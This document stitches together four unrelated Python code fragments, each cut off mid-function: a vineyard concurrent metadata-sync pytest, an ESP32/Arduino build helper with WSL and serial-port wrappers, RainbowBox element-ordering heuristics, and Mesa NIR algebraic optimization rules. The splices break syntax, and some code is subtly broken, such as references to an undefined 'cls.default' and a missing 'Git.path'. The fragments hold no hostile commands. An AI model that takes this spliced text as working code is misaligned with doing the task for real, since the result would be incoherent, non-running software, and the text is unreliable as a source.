rs.append(future.result())
if not all(rs):
pytest.fail("Failed to execute tests ...")
def test_concurrent_meta_sync(vineyard_ipc_sockets): # noqa: C901
num_proc = 8
job_per_proc = 128
def job1(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put(1)
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
except Exception as e: # pylint: disable=broad-except
print('failed: with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
return
rs.put((True, ''))
def job2(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put(1.23456)
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
except Exception as e: # pylint: disable=broad-except
print('failed: with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
return
rs.put((True, ''))
def job3(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put('xxxxabcd')
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
except Exception as e: # pylint: disable=broad-except
print('failed: with %r: %s' % (o, e), flush=True)
traceback.print_exc()
state.value = -1
rs.put((False, 'failed: %s' % e))
return
rs.put((True, ''))
def job4(rs, state, job_per_proc, vineyard_ipc_sockets):
sock1, sock2 = random.choices(vineyard_ipc_sockets, k=2)
client0 = vineyard.connect(sock1).fork()
client1 = vineyard.connect(sock2).fork()
for _ in range(job_per_proc):
if state.value != 0:
break
o = client0.put((1, 1.2345))
client0.persist(o)
try:
client1.sync_meta()
client1.get_meta(o)
client1.delete(o)
except Exception as e: # | |
#!/usr/bin/env python3
import argparse
import binascii
import collections.abc
import contextlib
import errno
import itertools
import json
import logging
import os
import pickle
import platform
import queue
import shutil
import subprocess
import sys
import threading
import time
from multiprocessing import Process, cpu_count
import serial.tools.list_ports as serial_list_ports
from serial import Serial as PySerial
from serial import serialutil
root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
external = os.path.join(root, 'external')
lib_path = os.path.join(root, 'arduino-libs')
out = os.path.join(root, 'out')
class ProcStreamReader(object):
__STREAMS = {"stdout", "stderr"}
def __init__(self, p, handlers=None):
self.p = p
self.__qs = {n: queue.Queue() for n in self.__STREAMS}
if handlers is None:
handlers = dict()
_handlers = {
n: tuple(e for e in (self.__qs[n].put, handlers.get(n)) if e)
for n in self.__STREAMS
}
for n in self.__STREAMS:
threading.Thread(
target=self.__qloop, args=(getattr(self.p, n), _handlers[n])
).start()
@staticmethod
def __qloop(fobj, handlers):
for l in map(str.strip, fobj or tuple()):
for h in handlers:
h(l)
def __get_line(self, fobj_name):
try:
return self.__qs[fobj_name].get(timeout=1)
except queue.Empty:
return None
def stdout_read_line(self):
return self.__get_line("stdout")
def stderr_read_line(self):
return self.__get_line("stderr")
class Logger(object):
def __init__(self):
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s/%(levelname)s] %(message)s',
'%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
root.addHandler(handler)
self.logger = root
self.scope_name = None
self.scopes = []
def __call__(self, scope_name):
self.scope_name = scope_name
return self
def __enter__(self):
scope_name = self.scope_name
self.scopes.append(scope_name)
scopes_dedup = list()
for scope in self.scopes:
if scope not in scopes_dedup:
scopes_dedup.append(scope)
self.set_name('/'.join(scopes_dedup))
return self
def __exit__(self, *args, **kwargs):
self.scopes = self.scopes[:-1]
scopes_dedup = list()
for scope in self.scopes:
if scope not in scopes_dedup:
scopes_dedup.append(scope)
self.set_name('/'.join(scopes_dedup))
return
def set_name(self, name):
self.logger.name = name
def debug(self, *args, **kwargs):
self.logger.debug(*args, **kwargs)
def info(self, *args, **kwargs):
self.logger.info(*args, **kwargs)
def warn(self, *args, **kwargs):
self.logger.warning(*args, **kwargs)
def warning(self, *args, **kwargs):
self.logger.warning(*args, **kwargs)
def error(self, *args, **kwargs):
self.logger.error(*args, **kwargs)
def command(self, *args, **kwargs):
self.logger.info("Running %r", args[0])
kwargs.setdefault('stdout', subprocess.PIPE)
kwargs.setdefault('stderr', subprocess.PIPE)
kwargs.setdefault('universal_newlines', True)
kwargs.setdefault('bufsize', 0)
env = os.environ.copy()
env.update(kwargs.pop('env', None) or {})
process = subprocess.Popen(*args, **kwargs, env=env)
ProcStreamReader(process, handlers={
"stdout": self.logger.info, "stderr": self.logger.error,
})
# If we don't specify a timeout, this tends to confuse the logger and
# end up blocking forever - probably something to do with our reader
# threads
return process.wait(timeout=600)
log = Logger()
class Wsl(object):
def __init__(self):
pass
def is_wsl(self):
with log('win'):
if os.name == 'nt':
return False
if os.path.exists('/mnt/c/Windows'):
return True
if os.environ.get('WSL_DISTRO_NAME'):
raise Exception("Please restart WSL with 'wsl.exe --shutdown' in command prompt")
return False
def comports(self):
with log('win'):
cmd = 'import serial.tools.list_ports; import pickle; import binascii; print(binascii.b2a_base64(pickle.dumps(list(serial.tools.list_ports.comports()))).decode())'
out = subprocess.check_output(['py.exe', '-3', '-c', cmd]).decode().strip()
return pickle.loads(binascii.a2b_base64(out))
@property
def environ(self):
with log('win'):
_environ = dict()
out = subprocess.check_output(['cmd.exe', '/c', 'set'], stderr=subprocess.DEVNULL).decode().strip()
for line in out.split('\n'):
line = line.strip()
if line == '':
continue
items = line.split('=')
key = items[0]
value = '='.join(items[1:])
_environ[key] = value
return _environ
def command(self, args):
with log('win'):
if args[0] == 'python3':
new_args = ['py.exe', '-3']
new_args.extend(args[1:])
return log.command(new_args)
args_pickle_hex = binascii.b2a_base64(pickle.dumps(args)).decode().strip()
cmd = "import sys; import subprocess; import pickle; import binascii; "
cmd += "args = pickle.loads(binascii.a2b_base64('{}')); ".format(args_pickle_hex)
cmd += "p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE); "
cmd += "a, b = p.communicate(); print(a.decode()); print(b.decode()); sys.exit(p.returncode); "
args = ['py.exe', '-3', '-c', cmd]
return log.command(args)
def copy_to_windows(self, path):
with log('win'):
if not os.path.exists('/mnt/c/tmp'):
os.mkdir('/mnt/c/tmp')
name = os.path.basename(path)
dst = os.path.join('/mnt/c/tmp', name)
winpath = 'c:\\tmp\\' + name
if os.path.exists(dst):
os.remove(dst)
shutil.copyfile(path, dst)
assert os.path.exists(dst)
return winpath
def path_on_windows(self, path):
with log('win'):
path = os.path.realpath(path)
share = '\\\\wsl$\\{}'.format(os.environ['WSL_DISTRO_NAME'])
path = path.replace('~/', '{}/'.format(os.environ['HOME']))
path = path.replace('/', '\\')
path = share + path
return path
def path_in_wsl(self, path):
path = path.replace('\\', '/')
if path.lower().startswith('//wsl$'):
path = '/' + '/'.join(path.split('/')[4:])
return path
wsl = Wsl()
class SerialPortNotFoundError(Exception):
pass
class Serial(object):
def __init__(self, serial=None):
self.ports = None
self.serial = serial
self.line = None
def clear_cache(self):
self.ports = None
def comports(self):
with log('serial'):
if isinstance(self.ports, list):
return self.ports
if not wsl.is_wsl():
self.ports = list(serial_list_ports.comports())
else:
self.ports = wsl.comports()
for port in self.ports:
if port.device.startswith('c'):
port.device = port.device.upper()
return self.ports
def find(self, description):
with log('serial'):
for port in self.comports():
if port.description.lower().find(description.lower()) != -1:
log.info('{} {}'.format(port.device, port.description))
return port.device
raise SerialPortNotFoundError
def __call__(self, *args, **kwargs):
serial = PySerial(*args, **kwargs, timeout=1)
return self.__class__(serial)
def __enter__(self, *args, **kwargs):
self.serial.__enter__(*args, **kwargs)
return self
def __exit__(self, *args, **kwargs):
return self.serial.__exit__(*args, **kwargs)
def read(self, size=1, block=True):
if block:
return self.serial.read(size)
data = b''
while self.serial.in_waiting and len(data) < size:
data += self.serial.read(1)
if len(data) == 0:
return None
return data
def readline(self, block=True):
if block:
data = b''
while not data.endswith(b'\r\n'):
data += self.read()
return data
data = b''
if self.line:
data = self.line
self.line = None
while True:
x = self.read(block=False)
if x == None:
break
data += x
if data.endswith(b'\r\n'):
break
if data.endswith(b'\r\n'):
return data
self.line = data
return None
serial = Serial()
class FakeSerial(object):
def __init__(self):
self.line = None
def __call__(self, *args, **kwargs):
return self.__class__()
def __enter__(self, *args, **kwargs):
return self
def __exit__(self, *args, **kwargs):
return
def read(self, size=1, block=True):
if block:
raise NotImplementedError("Would block forever, this is a fake device")
return None
def readline(self, block=True):
if block:
data = b''
while not data.endswith(b'\r\n'):
data += self.read()
return data
data = b''
if self.line:
data = self.line
self.line = None
while True:
x = self.read(block=False)
if x == None:
break
data += x
if data.endswith(b'\r\n'):
break
if data.endswith(b'\r\n'):
return data
self.line = data
return None
class Git(object):
def __init__(self, path='git'):
self.path = path
def check(self):
with log('git'):
# Confirm that we have `git` at all
assert log.command([self.path, '--version']) == 0
# Confirm that we can contact a remote
if log.command(
[self.path, 'ls-remote'], stdout=subprocess.DEVNULL,
start_new_session=True,
) != 0:
log.error(
"Unable to connect to the git remote - "
"skipping submodule update checks."
)
return False
return True
def init_submodules(self, *paths):
with log('git'):
log.info("Updating submodules...please wait..")
args = [
self.path, 'submodule', 'update', '--init', '--recursive',
"--", *paths,
]
if 0 != log.command(args):
raise Exception(' '.join(args))
git = Git()
class GitLFS(object):
def __init__(self, path="git-lfs"):
self.path = path
def check(self):
with log("git-lfs"):
# Confirm that we have `git-lfs` at all
if not log.command([self.path, "--version"]):
log.error("git-lfs program not found - unable to proceed")
raise FileNotFoundError(self.path)
# We prefer for the user to have installed the hooks as well but
# will only warn them if they haven't
if not log.command([Git.path, "lfs", "--version"]):
log.warning(
"git-lfs hooks not installed - "
"your working tree will be marked as changed when "
"LFS pointers are replaced with their corresponding files."
)
def checkout(self):
with log("git-lfs"):
for action in {"fetch", "checkout"}:
log.info("%s LFS files", action.title())
cmd = (self.path, action)
rv = log.command(cmd)
if rv != 0:
log.error("Failed to %s LFS files", action)
raise subprocess.CalledProcessError(rv, cmd)
lfs = GitLFS()
class CMake(object):
def __init__(self, path='cmake', default='Unix Makefiles'):
self.path = path
self.default = default
def check(self):
with log('cmake'):
log.command([self.path, '--version'])
def generate(
self, path, out,
generator=None, toolchain=None, debug=False,
defines=None, environ=None,
):
with log('cmake'):
if not generator:
generator = cls.default
if toolchain:
toolchain = os.path.abspath(toolchain)
if not os.path.exists(toolchain):
raise FileNotFoundError(toolchain)
path = os.path.abspath(path)
if not os.path.exists(path):
raise FileNotFoundError(path)
if not os.path.exists(out):
os.makedirs(out)
assert os.path.exists(out)
if not defines:
defines = list()
if toolchain:
defines.append(('CMAKE_TOOLCHAIN_FILE', toolchain))
defines.append(
("CMAKE_BUILD_TYPE", "Debug" if debug else "Release")
)
args = ['cmake']
for key, value in defines:
define = '-D{}'.format(key)
if value:
define = '{}={}'.format(define, value)
args.append(define)
args.extend(['-G', generator])
args.append(path)
if 0 != log.command(args, env=environ, cwd=out):
raise Exception(' '.join(args))
cmake = CMake()
class Make(object):
def __init__(self, path='make'):
self.path = path
def check(self):
with log('make'):
log.command([self.path, '--version'])
def build(self, path, environ=None, cores=None):
with log('make'):
if not os.path.exists(path):
raise FileNotFoundError(path)
args = ['make']
if cores:
args.append('-j{}'.format(cores))
assert 0 == log.command(args, cwd=path, env=environ)
make = Make()
class Wget(object):
def __init__(self, path='wget'):
self.path = path
def check(self):
with log('wget'):
log.command([self.path, '--version'])
def download(self, url, out):
with log('wget'):
if os.path.exists(out):
os.remove(out)
args = ['wget', '-O', out, url]
p = subprocess.Popen(args)
p.communicate()
if 0 != p.returncode:
raise Exception(' '.join(args))
wget = Wget()
class Tar(object):
def __init__(self, path='tar'):
self.path = path
def check(self):
with log('tar'):
log.command([self.path, '--version'])
def extract(self, path, out=None):
with log('tar'):
if out:
raise NotImplementedError
path = os.path.abspath(path)
if not os.path.exists(path):
raise FileNotFoundError(path)
cwd = os.path.dirname(path)
args = ['tar', 'xf', path]
p = subprocess.Popen(args, cwd=cwd)
p.communicate()
if 0 != p.returncode:
raise Exception(' '.join(args))
tar = Tar()
class XtensaTools(object):
URL = 'https://dl.espressif.com/dl/xtensa-esp32-elf-gcc8_2_0-esp32-2019r1-rc2-linux-amd64.tar.xz'
def __init__(self):
self.url = self.URL
self.xtena_sdk | |
# -*- coding: utf-8 -*-
# RainbowBox
# Copyright (C) 2015-2016 <NAME>
# LIMICS (Laboratoire d'informatique médicale et d'ingénierie des connaissances en santé), UMR_S 1142
# University Paris 13, Sorbonne paris-Cité, Bobigny, France
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, random
#from rainbowbox.order_base import *
from order_base import *
def best_elements_order(relations, elements = None, filter_order = None):
return best_elements_order_heuristic(relations, elements, filter_order)
def best_elements_order_np(relations, elements = None, filter_order = None, additional_criteria = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
if not additional_criteria: additional_criteria = lambda order: 0
element_groups = []
element_group_set = { None }
for element in elements:
if not element.group in element_group_set:
element_groups.append(element.group)
element_group_set.add(element.group)
if len(elements) == 1: return elements
for property in properties[:]:
nb = len(property_2_element_2_relation[property])
if nb <= 1: properties.remove(property) # Present for one element => does not influence best order
elif nb == len(elements): properties.remove(property) # Present for all elements => does not influence best order
coocurrences = {}
for subset in all_subsets(elements):
if (len(subset) <= 1) or (len(subset) == len(elements)): continue
subset = frozenset(subset)
coocurrences[subset] = 0
for property in properties:
for element in subset:
if not element in property_2_element_2_relation[property]: break
else: coocurrences[subset] += 1
if element_groups: elements_by_group = [all_orders(group.children) for group in element_groups]
else: elements_by_group = [all_orders(elements)]
orders = all_combinations(elements_by_group)
best_score = -1
for order in orders:
if filter_order and not filter_order(order): continue
score = 0
for sublist in all_sublists(order):
if (len(sublist) <= 1) or (len(sublist) == len(elements)): continue
subset = frozenset(sublist)
score += coocurrences[subset]
if score > best_score:
best_score = score
best_order = order
return best_order
def best_elements_order_np_hole(relations, elements = None, filter_order = None, custom_score_order = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
if len(elements) == 1: return elements
for property in properties[:]:
nb = len(property_2_element_2_relation[property])
if nb <= 1: properties.remove(property) # Present for one element => does not influence best order
elif nb == len(elements): properties.remove(property) # Present for all elements => does not influence best order
def score_order(order):
nb_hole = 0
length = 0
for property in properties:
start = None
end = None
in_hole = False
for i, element in enumerate(order):
if in_hole: length += 1
if element in property_2_element_2_relation[property]:
if start is None: start = i
end = i
in_hole = False
else:
if (not start is None) and (not in_hole):
in_hole = True
nb_hole += property.weight or 1
if not end is None:
if end != i: nb_hole -= property.weight or 1 # After end, it is not a hole!
return -nb_hole
#return -length
if custom_score_order:
combined_score_order = lambda order: custom_score_order(order, score_order)
else:
combined_score_order = score_order
best_score = None
best_order = None
for order in all_orders(elements):
if filter_order and not filter_order(order): continue
score = combined_score_order(order)
if (best_score is None) or (score > best_score):
best_score = score
best_order = order
return best_order
def best_elements_order_tree(relations, elements = None, filter_order = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
# distances = {}
# for e1 in elements:
# for e2 in elements:
# if (e1 is e2) or (id(e1) > id(e2)): continue
# nb_similarity = 0
# for property in properties[:]:
# if True == (e1 in property_2_element_2_relation[property]) == (e2 in property_2_element_2_relation[property]):
# nb_similarity += 2
# elif (e1 in property_2_element_2_relation[property]) == (e2 in property_2_element_2_relation[property]):
# nb_similarity += 1
# distances[e1, e2] = distances[e2, e1] = 1.0 - nb_similarity / len(properties)
distances = {}
for e1 in elements:
for e2 in elements:
if (e1 is e2) or (id(e1) > id(e2)): continue
d = 0
for property in properties[:]:
if (e1 in property_2_element_2_relation[property]) != (e2 in property_2_element_2_relation[property]):
d += 1.0
distances[e1, e2] = distances[e2, e1] = d
label_2_element = { element.label : element for element in elements }
from Bio.Phylo.TreeConstruction import _DistanceMatrix as DistanceMatrix, DistanceTreeConstructor
dm = DistanceMatrix([element.label for element in elements])
for e1 in elements:
for e2 in elements:
if (e1 is e2) or (id(e1) > id(e2)): continue
dm[e1.label, e2.label] = distances[e1, e2]
print(dm, file = sys.stderr)
treebuilder = DistanceTreeConstructor(None)
tree = treebuilder.nj(dm)
#tree = treebuilder.upgma(dm)
print(tree, file = sys.stderr)
def walker(clade):
if clade.clades:
results = []
partss = [walker(child) for child in clade.clades]
for ordered_parts in all_orders(partss):
combinations = all_combinations(ordered_parts)
results.extend(combinations)
return results
else:
element = label_2_element[clade.name]
return [ [element] ]
orders = walker(tree.root)
print(len(orders), file = sys.stderr)
def score_order(order):
nb_hole = 0
nb_prop_with_hole = 0
total_hole_length = 0
for property in properties:
start = None
end = None
in_hole = False
for i, element in enumerate(order):
if element in property_2_element_2_relation[property]:
if start is None: start = i
end = i
in_hole = False
else:
if (not start is None) and (not in_hole):
in_hole = True
nb_hole += 1
# After end, it is not a hole!
if end != i: nb_hole -= 1
if not end is None:
length = end - start + 1
if length > len(property_2_element_2_relation[property]):
total_hole_length += length - len(property_2_element_2_relation[property])
nb_prop_with_hole += 1
return (-nb_prop_with_hole, -nb_hole * 2 + -total_hole_length)
order, score = best(orders, score_order, score0 = (-sys.maxsize, -sys.maxsize))
return order
def best_elements_order_heuristic(relations, elements = None, filter_order = None):
present_elements, present_element_groups, properties, property_groups, element_2_property_2_relation, property_2_element_2_relation = relations_2_model(relations)
if not elements: elements = present_elements
elements = set(elements)
for e in elements:
if not e in element_2_property_2_relation: element_2_property_2_relation[e] = {} # Element with no relation are not present
for p in properties:
if not p in property_2_element_2_relation: property_2_element_2_relation[p] = {} # Property with no relation are not present
# This is the heuristic algorithm published, with a few additional optimizations (commented below).
def get_number_of_relation(e0):
return len([prop for prop in element_2_property_2_relation[e0] if len(property_2_element_2_relation[prop]) > 1])
candidate_first_elements, best_score = bests(elements, get_number_of_relation)
orders_being_constructed = { (e0,) for e0 in candidate_first_elements }
partial_orders_already_processed = set()
candidate_orders = set()
properties_with_more_than_one_element = [
property for property in properties
if len(property_2_element_2_relation[property]) > 1
]
def insertion_score(element, position, order):
if position is "beginning": neighbor = order[ 0]
elif position is "end": neighbor = order[-1]
score = 0
for x in element_2_property_2_relation[element]:
if x in element_2_property_2_relation[neighbor]: score += 2
for y in properties_with_more_than_one_element:
if ((not y in element_2_property_2_relation[element]) and
set(property_2_element_2_relation[y]).isdisjoint(order)): score += 1
#remnants = set(elements) - set(order)
#for x in element_2_property_2_relation[neighbor]:
# if not x in element_2_property_2_relation[element]:
# for remnant in remnants:
# if x in element_2_property_2_relation[remnant]:
# score -= 1
# break
return score
while orders_being_constructed:
#print(len(orders_being_constructed), file = sys.stderr)
order = orders_being_constructed.pop()
remnant = elements.difference(order)
possible_insertions = { (e, "beginning") for e in remnant } | { (e, "end") for e in remnant }
choosen_insertions, best_score = bests(possible_insertions, lambda pair: insertion_score(pair[0], pair[1], order))
already = set()
for (e, position) in choosen_insertions:
# Additional optimization (not in the published algorithm):
# for elements with identical set membership,
# test only one of them
key = (position, frozenset(element_2_property_2_relation[e]))
if key in already: continue
already.add(key)
if position == "beginning": new_order = (e,) + order
elif position == "end": new_order = order + (e,)
if len(new_order) == len(elements):
candidate_orders.add(new_order)
else:
if not new_order in partial_orders_already_processed:
# Additional optimization (not in the published algorithm):
# do not add in orders_being_constructed
| |
from the previous patterns with the application of b < 0 <=>
# 0 < -b. The transformation should be applied if either comparison is
# used once as this ensures that the number of comparisons will not
# increase. The sources to the ior and iand are not symmetric, so the
# rules have to be duplicated to get this behavior.
(('ior', ('flt(is_used_once)', 0.0, 'a@{}'.format(s)), ('flt', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmax', a, ('fneg', b)))),
(('ior', ('flt', 0.0, 'a@{}'.format(s)), ('flt(is_used_once)', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmax', a, ('fneg', b)))),
(('ior', ('fge(is_used_once)', 0.0, 'a@{}'.format(s)), ('fge', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmin', a, ('fneg', b)))),
(('ior', ('fge', 0.0, 'a@{}'.format(s)), ('fge(is_used_once)', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmin', a, ('fneg', b)))),
(('~iand', ('flt(is_used_once)', 0.0, 'a@{}'.format(s)), ('flt', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmin', a, ('fneg', b)))),
(('~iand', ('flt', 0.0, 'a@{}'.format(s)), ('flt(is_used_once)', 'b@{}'.format(s), 0.0)), ('flt', 0.0, ('fmin', a, ('fneg', b)))),
(('~iand', ('fge(is_used_once)', 0.0, 'a@{}'.format(s)), ('fge', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmax', a, ('fneg', b)))),
(('~iand', ('fge', 0.0, 'a@{}'.format(s)), ('fge(is_used_once)', 'b@{}'.format(s), 0.0)), ('fge', 0.0, ('fmax', a, ('fneg', b)))),
# The (i2f32, ...) part is an open-coded fsign. When that is combined
# with the bcsel, it's basically copysign(1.0, a). There are some
# behavior differences between this pattern and copysign w.r.t. ±0 and
# NaN. copysign(x, y) blindly takes the sign bit from y and applies it
# to x, regardless of whether either or both values are NaN.
#
# If a != a: bcsel(False, 1.0, i2f(b2i(False) - b2i(False))) = 0,
# int(NaN >= 0.0) - int(NaN < 0.0) = 0 - 0 = 0
# If a == ±0: bcsel(True, 1.0, ...) = 1.0,
# int(±0.0 >= 0.0) - int(±0.0 < 0.0) = 1 - 0 = 1
#
# For all other values of 'a', the original and replacement behave as
# copysign.
#
# Marking the replacement comparisons as precise prevents any future
# optimizations from replacing either of the comparisons with the
# logical-not of the other.
#
# Note: Use b2i32 in the replacement because some platforms that
# support fp16 don't support int16.
(('bcsel@{}'.format(s), ('feq', a, 0.0), 1.0, ('i2f{}'.format(s), ('iadd', ('b2i{}'.format(s), ('flt', 0.0, 'a@{}'.format(s))), ('ineg', ('b2i{}'.format(s), ('flt', 'a@{}'.format(s), 0.0)))))),
('i2f{}'.format(s), ('iadd', ('b2i32', ('!fge', a, 0.0)), ('ineg', ('b2i32', ('!flt', a, 0.0)))))),
(('bcsel', a, ('b2f(is_used_once)', 'b@{}'.<EMAIL>(s)), ('b2f', 'c@{}'.format(s))), ('b2f', ('bcsel', a, b, c))),
# The C spec says, "If the value of the integral part cannot be represented
# by the integer type, the behavior is undefined." "Undefined" can mean
# "the conversion doesn't happen at all."
(('~i2f{}'.format(s), ('f2i', 'a@{}'.format(s))), ('ftrunc', a)),
# Ironically, mark these as imprecise because removing the conversions may
# preserve more precision than doing the conversions (e.g.,
# uint(float(0x81818181u)) == 0x81818200).
(('~f2i{}'.format(s), ('i2f', 'a@{}'.format(s))), a),
(('~f2i{}'.format(s), ('u2f', 'a@{}'.format(s))), a),
(('~f2u{}'.format(s), ('i2f', 'a@{}'.format(s))), a),
(('~f2u{}'.format(s), ('u2f', 'a@{}'.format(s))), a),
(('fadd', ('b2f{}'.format(s), ('flt', 0.0, 'a@{}'.format(s))), ('fneg', ('b2f{}'.format(s), ('flt', 'a@{}'.format(s), 0.0)))), ('fsign', a), '!options->lower_fsign'),
(('iadd', ('b2i{}'.format(s), ('flt', 0, 'a@{}'.format(s))), ('ineg', ('b2i{}'.format(s), ('flt', 'a@{}'.format(s), 0)))), ('f2i{}'.format(s), ('fsign', a)), '!options->lower_fsign'),
])
# float? -> float? -> floatS ==> float? -> floatS
(('~f2f{}'.format(s), ('f2f', a)), ('f2f{}'.format(s), a)),
# int? -> float? -> floatS ==> int? -> floatS
(('~f2f{}'.format(s), ('u2f', a)), ('u2f{}'.format(s), a)),
(('~f2f{}'.format(s), ('i2f', a)), ('i2f{}'.format(s), a)),
# float? -> float? -> intS ==> float? -> intS
(('~f2u{}'.format(s), ('f2f', a)), ('f2u{}'.format(s), a)),
(('~f2i{}'.format(s), ('f2f', a)), ('f2i{}'.format(s), a)),
for B in [32, 64]:
if s < B:
optimizations.extend([
# S = smaller, B = bigger
# typeS -> typeB -> typeS ==> identity
(('f2f{}'.format(s), ('f2f{}'.format(B), 'a@{}'.format(s))), a),
(('i2i{}'.format(s), ('i2i{}'.format(B), 'a@{}'.format(s))), a),
(('u2u{}'.format(s), ('u2u{}'.format(B), 'a@{}'.format(s))), a),
# bool1 -> typeB -> typeS ==> bool1 -> typeS
(('f2f{}'.format(s), ('b2f{}'.format(B), 'a@1')), ('b2f{}'.format(s), a)),
(('i2i{}'.format(s), ('b2i{}'.format(B), 'a@1')), ('b2i{}'.format(s), a)),
(('u2u{}'.format(s), ('b2i{}'.format(B), 'a@1')), ('b2i{}'.format(s), a)),
# floatS -> floatB -> intB ==> floatS -> intB
(('f2u{}'.format(B), ('f2f{}'.format(B), 'a@{}'.format(s))), ('f2u{}'.format(B), a)),
(('f2i{}'.format(B), ('f2f{}'.format(B), 'a@{}'.format(s))), ('f2i{}'.format(B), a)),
# int? -> floatB -> floatS ==> int? -> floatS
(('f2f{}'.format(s), ('u2f{}'.format(B), a)), ('u2f{}'.format(s), a)),
(('f2f{}'.format(s), ('i2f{}'.format(B), a)), ('i2f{}'.format(s), a)),
# intS -> intB -> floatB ==> intS -> floatB
(('u2f{}'.format(B), ('u2u{}'.format(B), 'a@{}'.format(s))), ('u2f{}'.format(B), a)),
(('i2f{}'.format(B), ('i2i{}'.format(B), 'a@{}'.format(s))), ('i2f{}'.format(B), a)),
])
# mediump variants of the above
optimizations.extend([
# int32 -> float32 -> float16 ==> int32 -> float16
(('f2fmp', ('u2f32', 'a@32')), ('u2fmp', a)),
(('f2fmp', ('i2f32', 'a@32')), ('i2fmp', a)),
# float32 -> float16 -> int16 ==> float32 -> int16
(('f2u16', ('f2fmp', 'a@32')), ('f2u16', a)),
(('f2i16', ('f2fmp', 'a@32')), ('f2i16', a)),
# float32 -> int32 -> int16 ==> float32 -> int16
(('i2imp', ('f2u32', 'a@32')), ('f2ump', a)),
(('i2imp', ('f2i32', 'a@32')), ('f2imp', a)),
# int32 -> int16 -> float16 ==> int32 -> float16
(('u2f16', ('i2imp', 'a@32')), ('u2f16', a)),
(('i2f16', ('i2imp', 'a@32')), ('i2f16', a)),
])
# Integer sizes
for s in [8, 16, 32, 64]:
optimizations.extend([
(('iand', ('ieq', 'a@{}'.format(s), 0), ('ieq', 'b@{}'.format(s), 0)), ('ieq', ('ior', a, b), 0), 'options->lower_umax'),
(('ior', ('ine', 'a@{}'.format(s), 0), ('ine', 'b@{}'.format(s), 0)), ('ine', ('ior', a, b), 0), 'options->lower_umin'),
(('iand', ('ieq', 'a@{}'.format(s), 0), ('ieq', 'b@{}'.format(s), 0)), ('ieq', ('umax', a, b), 0), '!options->lower_umax'),
(('ior', ('ieq', 'a@{}'.format(s), 0), ('ieq', 'b@{}'.format(s), 0)), ('ieq', ('umin', a, b), 0), '!options->lower_umin'),
(('iand', ('ine', 'a@{}'.format(s), 0), ('ine', 'b@{}'.format(s), 0)), ('ine', ('umin', a, b), 0), '!options->lower_umin'),
(('ior', ('ine', 'a@{}'.format(s), 0), ('ine', 'b@{}'.format(s), 0)), ('ine', ('umax', a, b), 0), '!options->lower_umax'),
# True/False are ~0 and 0 in NIR. b2i of True is 1, and -1 is ~0 (True).
(('ineg', ('b2i{}'.format(s), 'a@{}'.format(s))), a),
# SM5 32-bit shifts are defined to use the 5 least significant bits (or 4 bits for 16 bits)
(('ishl', 'a@{}'.format(s), ('iand', s - 1, b)), ('ishl', a, b)),
(('ishr', 'a@{}'.format(s), ('iand', s - 1, b)), ('ishr', a, b)),
(('ushr', 'a@{}'.format(s), ('iand', s - 1, b)), ('ushr', a, b)),
])
optimizations.extend([
# Common pattern like 'if (i == 0 || i == 1 || ...)'
(('ior', ('ieq', a, 0), ('ieq', a, 1)), ('uge', 1, a)),
(('ior', ('uge', 1, a), ('ieq', a, 2)), ('uge', 2, a)),
(('ior', ('uge', 2, a), ('ieq', a, 3)), ('uge', 3, a)),
(('ior', a, ('ieq', a, False)), True),
(('ior', a, ('inot', a)), -1),
(('ine', ('ineg', ('b2i', 'a@1')), ('ineg', ('b2i', 'b@1'))), ('ine', a, b)),
(('b2i', ('ine', 'a@1', 'b@1')), ('b2i', ('ixor', a, b))),
# This pattern occurs coutresy of __flt64_nonnan in the soft-fp64 code.
# The first part of the iand comes from the !__feq64_nonnan.
#
# The second pattern is a reformulation of the first based on the relation
# (a == 0 || y == 0) <=> umin(a, y) == 0, where b in the first equation
# happens to be y == 0.
(('iand', ('inot', ('iand', ('ior', ('ieq', a, 0), b), c)), ('ilt', a, 0)),
('iand', ('inot', ('iand', b , c)), ('ilt', a, 0))),
(('iand', ('inot', ('iand', ('ieq', ('umin', a, b), 0), c)), ('ilt', a, 0)),
